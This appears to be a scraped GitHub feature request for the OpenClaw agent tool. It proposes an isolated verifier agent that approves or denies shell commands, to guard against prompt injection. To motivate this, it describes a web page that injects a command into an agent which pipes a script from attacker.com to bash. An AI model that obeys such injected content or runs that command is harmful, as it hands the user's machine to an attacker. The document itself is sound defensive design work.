openclaw - 💡(How to fix) Fix [Feature]: Agent-as-Approver for Exec Approvals

Root Cause

Real-world scenario from our setup: A cron job fetches web content and the agent processes it. If a page contains prompt injection that tricks the agent into running python3 -c "import os; os.system('curl attacker.com/steal.sh | bash')", the current allowlist passes it because python3 is allowlisted. A human might catch it — but only if they're reading carefully and understand the command. An agent verifier seeing just the raw command (without the injected context) would flag the suspicious curl | bash pattern.

Code Example

{
  approvals: {
    exec: {
      enabled: true,
      mode: "agent",  // new mode alongside "session" and "targets"
      agent: {
        agentId: "exec-verifier",  // or external endpoint
        policy: "default",         // or path to custom policy
        context: "command-only",   // never send conversation history
        fallback: "deny",         // if verifier unavailable: "deny", "ask-human", or "allow"
        timeoutMs: 10000,
        notifyOnDeny: true,       // optionally alert human on denials
        notifyChannel: "telegram"
      }
    }
  }
}

Summary

Allow an independent AI agent to serve as an automated exec approval verifier, providing a middle ground between human-in-the-loop and no approvals (YOLO).

Problem to solve

The current exec approval system is binary: either a human reviews every command, or approvals are off entirely. This creates problems:

Approval fatigue: Non-technical users don't understand most commands and end up rubber-stamping everything, defeating the security purpose
Workflow disruption: Even for technical users, frequent approval prompts for routine commands interrupt flow
No unattended protection: Cron jobs and background tasks that execute unattended have no approval layer — toolsAllow restricts which tools are available but can't evaluate how allowed tools are being used (e.g., curl used for exfiltration vs. a local health check)

Meanwhile, prompt injection is a real threat: a malicious web page fetched by a cron job or browsing session can trick the agent into executing arbitrary commands using already-allowlisted tools.

Proposed solution

Add an agent-as-approver mode in the exec approval flow. When the primary agent requests a command, instead of prompting the human, OpenClaw sends the raw command only (no conversation context, no reasoning) to a designated verifier agent that evaluates it against a safety policy.

Key design principles:

Context isolation is the security model. The verifier never sees the web page, conversation history, or reasoning that led to the command. A prompt injection that corrupted the primary agent's context doesn't reach the verifier.
The verifier is narrow and rules-based. Rather than open-ended "is this safe?", it checks explicit rules: Does this pipe to bash/eval? Does it access the network? Does it modify files outside the workspace? Does it match known-safe patterns?
Different model recommended. Using a different model eliminates shared model vulnerabilities, though context isolation provides the primary protection.

Configuration concept:

{
  approvals: {
    exec: {
      enabled: true,
      mode: "agent",  // new mode alongside "session" and "targets"
      agent: {
        agentId: "exec-verifier",  // or external endpoint
        policy: "default",         // or path to custom policy
        context: "command-only",   // never send conversation history
        fallback: "deny",         // if verifier unavailable: "deny", "ask-human", or "allow"
        timeoutMs: 10000,
        notifyOnDeny: true,       // optionally alert human on denials
        notifyChannel: "telegram"
      }
    }
  }
}

Flow: Primary agent requests exec → OpenClaw sends raw command to verifier → Verifier approves/denies based on policy → If denied, optionally notify human.

Alternatives considered

Human-only approvals (current): Works for technical users but creates approval fatigue for non-technical operators who rubber-stamp everything
Strict allowlist only: Prevents unknown commands but doesn't catch misuse of allowed commands (e.g., curl used for data exfiltration instead of a local service check)
Model self-policing via system prompt: Single point of failure — if the model is prompt-injected, the safety instructions are ignored along with everything else

Impact

Affected users: Non-technical operators, multi-agent setups handling untrusted web content, anyone running unattended cron jobs with exec access
Severity: Medium-high — approval fatigue means the security layer exists on paper but provides no real protection when users rubber-stamp
Frequency: Every exec approval prompt (multiple times per session for active users)
Consequence: Either users disable approvals entirely (no protection) or rubber-stamp them (false sense of security). No middle ground exists today.

Evidence/examples

Additional information

Limitations (honest assessment):

Not a silver bullet — sophisticated attacks crafting legitimate-looking commands can fool both agents
Same-model weakness if both agents share weights (mitigated by context isolation)
Adds one API call of latency per exec request
New failure mode if verifier service is down (mitigated by configurable fallback)

Complementary to existing features: This works alongside toolsAllow (restricts available tools), strictInlineEval (blocks inline code eval), and allowlist mode (restricts allowed binaries). The agent verifier adds semantic evaluation that static rules can't provide.

Data

Security

Network

Code

UI/UX

Text

System

Multimedia

Protocol

API

Engineering

openclaw - 💡(How to fix) Fix [Feature]: Agent-as-Approver for Exec Approvals

Recommended Tools

GitHub issue graph ai analysis

Root Cause

Code Example

Summary

Problem to solve

Proposed solution

Alternatives considered

Impact

Evidence/examples

Additional information

Still need to ship something?

TRENDING

openclaw - 💡(How to fix) Fix [Feature]: Agent-as-Approver for Exec Approvals

Recommended Tools

GitHub issue graph ai analysis

Root Cause

Code Example

Summary

Problem to solve

Proposed solution

Alternatives considered

Impact

Evidence/examples

Additional information

Still need to ship something?

RELATED_DISCOVERY

TRENDING